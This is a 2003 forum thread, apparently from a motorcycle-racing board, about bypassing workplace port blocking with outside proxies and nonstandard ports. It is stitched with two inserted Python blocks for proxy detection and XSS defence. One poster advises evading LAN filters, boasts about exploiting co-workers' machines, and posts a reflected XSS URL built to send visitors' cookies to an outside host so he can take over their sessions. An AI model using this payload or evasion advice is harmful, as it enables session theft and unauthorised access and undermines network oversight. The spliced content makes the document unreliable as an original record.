OK all you software gurus.......

Started by EX#996, February 27, 2003, 03:36:14 PM


ecumike

Awe shlt, we have a 26er in the house!!!

Spyder, why do you read that 'mag'?  What do you do for work?

sdiver68

What if your company has ports other than the common ones blocked?  i.e. HTTP, FTP, etc...  then the whole scheme does not work, no?

Also, what happens when the LAN administrator notices a surge in traffic on port 3128?

Not that they would typically look for that  :-/
MCRA Race School Instructor

spyderchick

Quote: Awe shlt, we have a 26er in the house!!!

Spyder, why do you read that 'mag'?  What do you do for work?

Why do I read it? Hmmm. Aw shucks, I dunno.  Maybe cuz, wait...why do You read it?  :P
Actually, I just dabble.

What do I do for work? WHAT DO I DO FOR WORK?  ;D

I'm your friendly neighborhood leather repair chick, of course.  
Alexa Krueger
Spyder Leatherworks
414.327.0967
www.spyderleatherworks.com
www.redflagfund.org
Do or do not, there is no "try".

ecumike

Well, if your employer is REAL tight and the LAN dudes are some of those control freaks, then sure, if they also monitor port 8080, 20, 21, etc., then yea, your data stream will get picked up by the filter.

But remember... PORT 80 is the default.. they really have no reason to monitor any other port for HTTP traffic, it would just be a crap shoot... there are thousands of PORTs.

3128 is an open/non-used port, as is 8080 and ANY port #s not listed below..
7, 9, 11, 13, 17, 19, 20, 21, 23, 25, 37, 39, 42, 43, 53, 67, 68, 69, 70, 79, 80, 88, 101, 102, 107, 109, 110, 111, 113, 117, 119, 123, 135, 137, 138, 139, 143, 158, 161, 162, 170, 179, 194, 213, 389, 443, 445, 464, 500, 512, 513, 513, 514, 515, 517, 518, 520, 525, 526, 530, 531, 532, 533, 540, 543, 544, 550, 556, 560, 561, 666, 749, 750, 1109, 1167, 1433, 1434, 1434, 1512, 1524, 1701, 1723, 1812, 1813, 2049, 2053, 9535

If you don't see a number listed above, you can make it up and use it as a port #... so ya see.. there are too many to filter them all. Also... the ports above are USED by other protocols and programs, it would take a significant amount of server to log/filter all those.

Suppose your CO. blocks Limewire so that employees aren't sucking up bandwidth to share and download MP3s. How do they do that?.. They can block the default port that LimeWire uses.. 6344. So what can you do?  Being a smart user, change the port # in the program.

You can make/create/use almost ANY number up to 5 digits. (I think..it's been a few years since I got my MCSE)
So like you could set it to 10443 if you want.

But yea, you're at the 'mercy' of the port that the proxy server that you find uses. If your admin HAPPENS to block that port.. then just find another server that uses a different port.
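On the admin side of sdiver68's question: a filter that keys on what a connection carries, rather than on the port number, still sees a proxy request on 3128, 10443 or any other port. The sketch below is an added example, not part of the original posts; the flow tuples, addresses and the sanctioned-proxy set are constructed for illustration.

```python
import re

METHODS = rb"(?:GET|POST|HEAD|PUT|DELETE|OPTIONS)"
# A forward-proxy request names the full URL (or uses CONNECT host:port);
# a request sent straight to a web server names only a path.
PROXY_REQ = re.compile(
    rb"^(?:" + METHODS + rb" https?://\S+|CONNECT \S+:\d+) HTTP/1\.[01]\r\n")
ORIGIN_REQ = re.compile(rb"^" + METHODS + rb" /\S* HTTP/1\.[01]\r\n")

# Assumption: the one proxy the company runs itself.
SANCTIONED_PROXIES = {("10.0.0.1", 8080)}

# Constructed sample flows: (source, destination, dest port, first payload bytes)
SAMPLE_FLOWS = [
    ("10.0.0.5", "203.0.113.7", 3128,
     b"GET http://example.org/ HTTP/1.1\r\nHost: example.org\r\n\r\n"),
    ("10.0.0.6", "198.51.100.2", 80,
     b"GET /index.html HTTP/1.1\r\nHost: example.org\r\n\r\n"),
    ("10.0.0.7", "203.0.113.9", 10443,
     b"CONNECT example.org:443 HTTP/1.1\r\nHost: example.org:443\r\n\r\n"),
    ("10.0.0.8", "198.51.100.3", 25, b"EHLO mail.example.org\r\n"),
    ("10.0.0.9", "10.0.0.1", 8080,
     b"GET http://example.org/ HTTP/1.1\r\nHost: example.org\r\n\r\n"),
    ("10.0.0.4", "198.51.100.4", 8000, b"GET / HTTP/1.0\r\n\r\n"),
]

def classify(first_bytes: bytes) -> str:
    """Label a flow by its first payload bytes, ignoring the port."""
    if PROXY_REQ.match(first_bytes):
        return "http-proxy"
    if ORIGIN_REQ.match(first_bytes):
        return "http"
    return "other"

def flag_flows(flows, sanctioned=SANCTIONED_PROXIES):
    """Return (src, dst, port, reason) for HTTP that bypasses the default path."""
    findings = []
    for src, dst, port, payload in flows:
        kind = classify(payload)
        if kind == "http-proxy" and (dst, port) not in sanctioned:
            findings.append((src, dst, port, "proxy request to unsanctioned host"))
        elif kind == "http" and port != 80:
            findings.append((src, dst, port, "HTTP on non-default port"))
    return findings

if __name__ == "__main__":
    for finding in flag_flows(SAMPLE_FLOWS):
        print(finding)
```

Only cleartext payloads are classified here; TLS-wrapped connections need TLS inspection or destination-based controls instead.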

ecumike

Quote: Why do I read it? Hmmm. Aw shucks, I dunno.  Maybe cuz, wait...why do You read it?  :P
Actually, I just dabble.

What do I do for work? WHAT DO I DO FOR WORK?  ;D

I'm your friendly neighborhood leather repair chick, of course.  


I read it:
A. B/C it really opens your eyes to what people can and are doing through computers
B. It makes you a less naive person when it comes to those sorts of things ("oh you can do that?")
C. I'm a Web developer and keep up on the latest and greatest hacks and tricks

OK the real reasons...
A. I like to screw with people/co-workers on the LAN who have vulnerabilities on their systems
B. I like to exploit viruses of those such people and see what I can actually do with their computer
C. It's cool shlt to read about, there's some smart mofo.s out there

Yes, I knew you did leather work.. just didn't know if there was some other work that you did that you read it for.

ecumike

Want to see a prime example...

A cross-site scripting vulnerability on this here board...
CLICK HERE

Or how's about this...
CLICK HERE

Not to scare anyone, b/c it doesn't EXACTLY work buuuutttt...
This one could send your Cookie info to my site, where it would get tagged in the Web stats log. I could then look it up, and when I go to this site (CCS BBS), I could send out YOUR cookie ID instead of mine, and then I'd be logged in as you.

This one isn't working b/c the BBS is not escaping the characters, but here WAS the example...

http://www.racemotorcycles.com/cgi-bin/board/YaBB.pl?board=ccs1;action=display;num=<Script>location%3d'http://santelia.org/index.shtml?Cookie%3d'%2b(document.Cracker)%3b</Script>



OK I'm done playing. :)
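What a board can do on its side against the `num=<Script>…` request shown in the post above, as an added example that is not part of the original thread and not YaBB's own code: accept only digits for the thread number, entity-encode any request value echoed into a page, and mark the session cookie HttpOnly so page scripts cannot read it. The function names, the cookie name `session` and the sample query (same URL shape, harmless payload) are constructed for illustration.

```python
import html
import re
from http.cookies import SimpleCookie
from urllib.parse import unquote

# Constructed sample: the post's ';'-separated query shape, harmless payload.
SAMPLE_QUERY = "board=ccs1;action=display;num=<Script>alert(1)%3b</Script>"

def parse_query(query: str) -> dict:
    """Split on ';' first, then percent-decode, so an encoded %3b
    inside a value cannot create extra parameters."""
    params = {}
    for pair in query.split(";"):
        key, _, value = pair.partition("=")
        if key:
            params[key] = unquote(value)
    return params

def thread_number(params: dict):
    """Allow-list check: a thread number is ASCII digits only, else None."""
    value = params.get("num", "")
    return int(value) if re.fullmatch(r"[0-9]{1,20}", value) else None

def error_page(params: dict) -> str:
    """Any request value echoed into HTML is entity-encoded first."""
    shown = html.escape(params.get("num", ""), quote=True)
    return f"<p>No such thread: {shown}</p>"

def session_cookie(session_id: str) -> str:
    """Build the Set-Cookie value; HttpOnly hides it from page scripts."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()

if __name__ == "__main__":
    params = parse_query(SAMPLE_QUERY)
    print(thread_number(params))      # rejected: not a number
    print(error_page(params))         # markup rendered inert
    print(session_cookie("abc123"))   # constructed session id
```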

spyderchick

Oh Mike, you are such a fart smeller! Gotta love computer "magic".

Yeah, 2600 is fun and informative.  More people should read it. No, I'm not an IT person, but like you, it's good to be informed about the bigger wider world out there. How many people know who Kevin Mitnick is, and would they care?


ecumike

And would you know that he was caught just 15 minutes down the road from where I live?

spyderchick

There's a little bit of Kevin in all of us.